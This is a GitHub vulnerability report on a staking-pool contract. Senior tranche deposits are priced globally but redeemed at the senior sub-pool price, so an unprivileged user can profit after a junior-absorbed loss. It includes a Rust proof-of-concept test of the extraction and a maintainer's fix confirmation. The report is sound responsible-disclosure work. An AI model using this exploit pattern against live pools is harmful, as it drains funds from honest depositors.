### ISSUE TITLE
Senior LP deposits priced against the global pool but redeemed against the senior sub-pool — unprivileged value extraction from senior LPs after a junior-absorbed loss

### ISSUE THREAD

**Issue by 0x-SquidSol** [dcccrypto/percolator-stake#134]
## Summary

When tranches are enabled, a **senior** deposit mints LP at the **global** pool price, but a **senior** withdrawal redeems at the **senior sub-pool** price. After the junior tranche has absorbed any insurance loss (`total_flushed > total_returned`), these two price bases diverge — the global per-LP price falls strictly below the senior per-LP price. An unprivileged user can exploit this by depositing as a senior (minting LP cheaply at the global price) and immediately redeeming (at the richer senior price), extracting value from existing senior LP holders and eroding the junior first-loss buffer. No admin privilege is required.

The junior deposit path was already fixed to price against its own sub-pool (`effective_junior_balance()`), and the senior *withdrawal* path was deliberately made sub-pool-aware — but the senior *deposit* path was never given the symmetric treatment and still uses the global formula.

## Affected code

- `src/processor.rs:507-509` — `process_deposit` mints LP via `pool.calc_lp_for_deposit(amount)` with **no `tranche_enabled()` branch**.
- `src/state.rs:449-452` — `StakePool::calc_lp_for_deposit` delegates to `math::calc_lp_for_deposit(self.total_lp_supply, total_pool_value(), amount)` — the **global** supply/value.
- `src/processor.rs:811-819` — `process_withdraw` (senior tranche branch) redeems via `math::calc_senior_collateral_for_withdraw(pool.senior_total_lp(), pool.senior_balance(), lp_amount)` — the **senior sub-pool**. (The in-code comment notes this is to stop seniors "extract[ing] junior-backed funds.")
- `src/state.rs:277-309` — `effective_junior_balance()` / `senior_balance()`: after a junior-absorbed loss, `effective_junior_balance() < junior_balance`, which is what makes the senior sub-pool price exceed the global price.
- Contrast — the symmetric path that *was* fixed: `src/processor.rs:1963-1975` — `process_deposit_junior` prices against `effective_junior_balance()` precisely "so that LP pricing reflects any insurance losses already absorbed by the junior tranche."

## Mechanism

- Senior **deposit** price (global): `lp = amount * total_lp_supply / total_pool_value()`.
- Senior **withdraw** price (sub-pool): `coll = lp * senior_balance() / senior_total_lp()`, where `senior_balance() = total_pool_value() - effective_junior_balance()`.

In steady state these agree. But once the junior tranche absorbs a loss, `effective_junior_balance()` is written down, so `total_pool_value()` (which the global price divides by, blended across both tranches) is depressed more than `senior_balance()` (which excludes the junior write-down). Therefore `global_price < senior_price`, and a senior deposit **over-issues** senior LP relative to what the senior sub-pool warrants. Redeeming that LP at the senior price returns more than was deposited; the surplus is taken from incumbent senior LP holders.

(The mirror case exists for trading pools when the junior tranche holds a *fee gain*: there `global_price > senior_price`, so a new senior *overpays* — a fairness defect rather than theft, with the same root cause.)

## Impact

Any unprivileged user can extract value from existing senior LP holders whenever the pool is in a post-loss state (`total_flushed > total_returned`) and a senior position exists — i.e., the normal operating state of an insurance vault that has paid out. The "senior protection" the tranche design provides is broken: an incumbent senior who should redeem ~1:1 is instead diluted, with the shortfall captured by the attacker. The extraction scales with the outstanding loss and the deposit size, and the withdrawal cooldown only delays the attacker's exit — it does not prevent the dilution (the mispriced LP count is locked at mint time). This is a direct, unprivileged transfer of funds between users.

## Proof of concept

The PoC is a state/math-level test in this repo's own convention (the repo tests "entirely on structs and data — no Solana runtime"). It exercises the **exact functions the processor calls** — `StakePool::calc_lp_for_deposit` for the senior deposit (what `process_deposit` uses) and `math::calc_senior_collateral_for_withdraw` for the senior withdraw (what `process_withdraw` uses) — and models deposits/withdrawals on the pool struct the same way `tests/integration.rs` does.

Add as `tests/poc_senior_deposit_mispricing.rs`:

```rust
//! PoC — Senior LP deposit/withdraw pricing asymmetry (tranche pool).
//!
//! ── The bug ──────────────────────────────────────────────────────────────────
//! When tranches are enabled, a *senior* deposit (`process_deposit`) mints LP at
//! the GLOBAL pool price:
//!     lp = amount * total_lp_supply / total_pool_value()        (state::calc_lp_for_deposit)
//! but a *senior* withdraw (`process_withdraw`, tranche branch) redeems at the
//! SENIOR SUB-POOL price:
//!     coll = lp * senior_balance() / senior_total_lp()          (math::calc_senior_collateral_for_withdraw)
//!
//! The junior deposit path WAS fixed to price against the junior sub-pool
//! (`effective_junior_balance()`), and the senior WITHDRAW path was deliberately
//! made sub-pool-aware — but the senior DEPOSIT path was never given the
//! symmetric fix; it still uses the global formula.
//!
//! After any junior-absorbed loss (`total_flushed > total_returned`),
//! `effective_junior_balance() < junior_balance`, so the global per-LP price is
//! strictly BELOW the senior per-LP price. An unprivileged user can therefore
//! mint senior LP cheap (global) and redeem it dear (senior sub-pool), extracting
//! value from existing senior LP holders and the junior first-loss buffer.
//!
//! This test exercises the EXACT functions the processor calls
//! (`StakePool::calc_lp_for_deposit` for deposit; `math::calc_senior_collateral_for_withdraw`
//! for senior withdraw), modeling deposits/withdraws on the pool struct the same
//! way the repo's own integration tests do (no runtime — by repo convention).

use bytemuck::Zeroable;
use percolator_stake::math::calc_senior_collateral_for_withdraw;
use percolator_stake::state::StakePool;

/// Mirror of the repo's `initialized_pool()` test helper (integration.rs).
fn initialized_pool() -> StakePool {
    let mut pool = StakePool::zeroed();
    pool.is_initialized = 1;
    pool.bump = 255;
    pool.vault_authority_bump = 254;
    pool.admin_transferred = 1;
    pool.set_discriminator();
    pool
}

/// Model a SENIOR deposit exactly as `process_deposit` does: price via the GLOBAL
/// `calc_lp_for_deposit`, then bump global counters. Returns the LP minted.
fn senior_deposit(pool: &mut StakePool, amount: u64) -> u64 {
    let lp = pool.calc_lp_for_deposit(amount).expect("calc_lp_for_deposit");
    pool.total_deposited += amount;
    pool.total_lp_supply += lp;
    lp
}

/// Model a SENIOR withdraw exactly as `process_withdraw` (tranche branch) does:
/// value via the SENIOR sub-pool, then bump global counters. Returns collateral out.
fn senior_withdraw(pool: &mut StakePool, lp: u64) -> u64 {
    let senior_lp = pool.senior_total_lp();
    let senior_bal = pool.senior_balance().expect("senior_balance");
    let coll = calc_senior_collateral_for_withdraw(senior_lp, senior_bal, lp)
        .expect("calc_senior_collateral_for_withdraw");
    pool.total_withdrawn += coll;
    pool.total_lp_supply -= lp;
    coll
}

#[test]
fn poc_senior_deposit_mispricing_extracts_value_from_existing_seniors() {
    let mut pool = initialized_pool();
    pool.set_tranche_enabled(true);

    // ── Setup: one junior (1M) + one honest senior "Alice" (1M) ──────────────
    let junior_dep = 1_000_000u64;
    pool.set_junior_balance(junior_dep);
    pool.set_junior_total_lp(junior_dep); // first junior: 1:1
    pool.total_deposited += junior_dep;
    pool.total_lp_supply += junior_dep;

    let alice_dep = 1_000_000u64;
    let alice_lp = senior_deposit(&mut pool, alice_dep); // global price (1:1 here) -> 1M LP

    // ── Insurance loss: admin flushes 800k; junior absorbs it first ───────────
    pool.total_flushed = 800_000;

    // Sanity: junior took the hit, senior is "protected", and the two price bases diverge.
    assert_eq!(pool.effective_junior_balance(), 200_000, "junior absorbed 800k of its 1M");
    let senior_bal_before = pool.senior_balance().unwrap();
    let senior_lp_before = pool.senior_total_lp();
    assert_eq!(senior_bal_before, 1_000_000, "senior fully shielded from the loss");
    assert_eq!(senior_lp_before, 1_000_000);
    // Global price = total_pool_value/total_lp_supply = 1.2M/2M = 0.6
    // Senior price = senior_balance/senior_total_lp = 1.0M/1M = 1.0  (strictly higher)
    let global_pv = pool.total_pool_value().unwrap();
    assert_eq!(global_pv, 1_200_000);
    assert!(
        senior_bal_before * pool.total_lp_supply > global_pv * senior_lp_before,
        "PRECONDITION: senior per-LP price strictly exceeds global per-LP price"
    );

    // Alice's fair claim right now (what she's 'protected' for):
    let alice_fair_before =
        calc_senior_collateral_for_withdraw(senior_lp_before, senior_bal_before, alice_lp).unwrap();
    assert_eq!(alice_fair_before, 1_000_000, "Alice should be able to redeem her full 1M");

    // ── ATTACK: unprivileged user "Eve" senior-deposits 1M, then withdraws ────
    let eve_dep = 1_000_000u64;
    let eve_lp = senior_deposit(&mut pool, eve_dep); // GLOBAL price -> overpriced LP count
    // Eve minted ~1.666M senior LP for 1M (global 0.6/LP) vs the senior sub-pool's 1.0/LP.
    assert!(eve_lp > eve_dep, "PROOF(setup): Eve minted MORE LP than deposit at the cheap global price");

    let eve_back = senior_withdraw(&mut pool, eve_lp); // redeemed at the SENIOR price

    // PROOF(1): Eve profits, risk-free, with no privilege.
    assert!(
        eve_back > eve_dep,
        "PROOF(1): Eve withdrew {eve_back} on a {eve_dep} deposit — unprivileged profit"
    );
    let eve_profit = eve_back - eve_dep;
    assert!(eve_profit >= 240_000, "PROOF(1): profit is material (~{eve_profit}, ~25%)");

    // PROOF(2): the profit is extracted from the pre-existing senior holder Alice.
    let alice_after = calc_senior_collateral_for_withdraw(
        pool.senior_total_lp(),
        pool.senior_balance().unwrap(),
        alice_lp,
    )
    .unwrap();
    assert!(
        alice_after < alice_fair_before,
        "PROOF(2): Alice's claim dropped from {alice_fair_before} to {alice_after}"
    );
    let alice_loss = alice_fair_before - alice_after;
    // Alice's loss matches Eve's gain (±rounding) — a direct value transfer.
    let diff = if alice_loss > eve_profit { alice_loss - eve_profit } else { eve_profit - alice_loss };
    assert!(diff <= 2, "PROOF(2): Alice's loss ({alice_loss}) ≈ Eve's gain ({eve_profit})");
}

#[test]
fn control_senior_deposit_priced_against_subpool_yields_no_profit() {
    // Identical setup, but price Eve's deposit against the SENIOR sub-pool (the
    // fix direction, mirroring the junior path). The profit vanishes — isolating
    // the global-vs-senior asymmetry as the sole cause.
    let mut pool = initialized_pool();
    pool.set_tranche_enabled(true);

    let junior_dep = 1_000_000u64;
    pool.set_junior_balance(junior_dep);
    pool.set_junior_total_lp(junior_dep);
    pool.total_deposited += junior_dep;
    pool.total_lp_supply += junior_dep;

    let _alice_lp = senior_deposit(&mut pool, 1_000_000);
    pool.total_flushed = 800_000;

    // Eve deposits 1M, but priced CORRECTLY against the senior sub-pool:
    //   eve_lp = amount * senior_total_lp / senior_balance
    let eve_dep = 1_000_000u64;
    let senior_lp = pool.senior_total_lp();
    let senior_bal = pool.senior_balance().unwrap();
    let eve_lp_fair = ((eve_dep as u128 * senior_lp as u128) / senior_bal as u128) as u64;
    pool.total_deposited += eve_dep;
    pool.total_lp_supply += eve_lp_fair;

    let eve_back = senior_withdraw(&mut pool, eve_lp_fair);
    assert!(
        eve_back <= eve_dep,
        "CONTROL: sub-pool-priced senior deposit yields NO profit (got {eve_back} for {eve_dep})"
    );
}
```

**Reproduction output** (run against the compiled `percolator-stake` lib):

```
--- after junior-absorbed loss ---
effective_junior_balance = 200000   (junior absorbed 800k of 1M)
global price  = total_pool_value/total_lp_supply = 1200000/2000000 = 0.6000
senior price  = senior_balance/senior_total_lp   = 1000000/1000000 = 1.0000
Alice fair claim (1M LP) = 1000000
--- attack ---
Eve deposited 1000000, minted 1666666 senior LP (global price), withdrew 1249999
Eve PROFIT  = 249999
Alice claim: 1000000 -> 750001  (loss 249999)
--- control (senior-subpool pricing) ---
Eve fair-priced minted 1000000 LP, withdrew 1000000 (profit 0)
```

The headline test asserts the attacker's `withdraw > deposit` (~+25% here) and that the incumbent senior's claim drops by exactly the attacker's gain (a clean value transfer). The control test prices the same deposit against the senior sub-pool (the fix direction, mirroring the junior path) and shows the profit vanishes — isolating the global-vs-sub-pool asymmetry as the sole cause.

The base LP math is Kani-proven and clean; this issue is specific to the tranche deposit/withdraw pricing asymmetry, which is not covered by the existing proofs or `docs/AUDIT.md`.

**Comment by dcccrypto** [comment]
Fixed in v17 `main` via #142 (verified against source + build-sbf + 325 tests green). Thanks for the report.
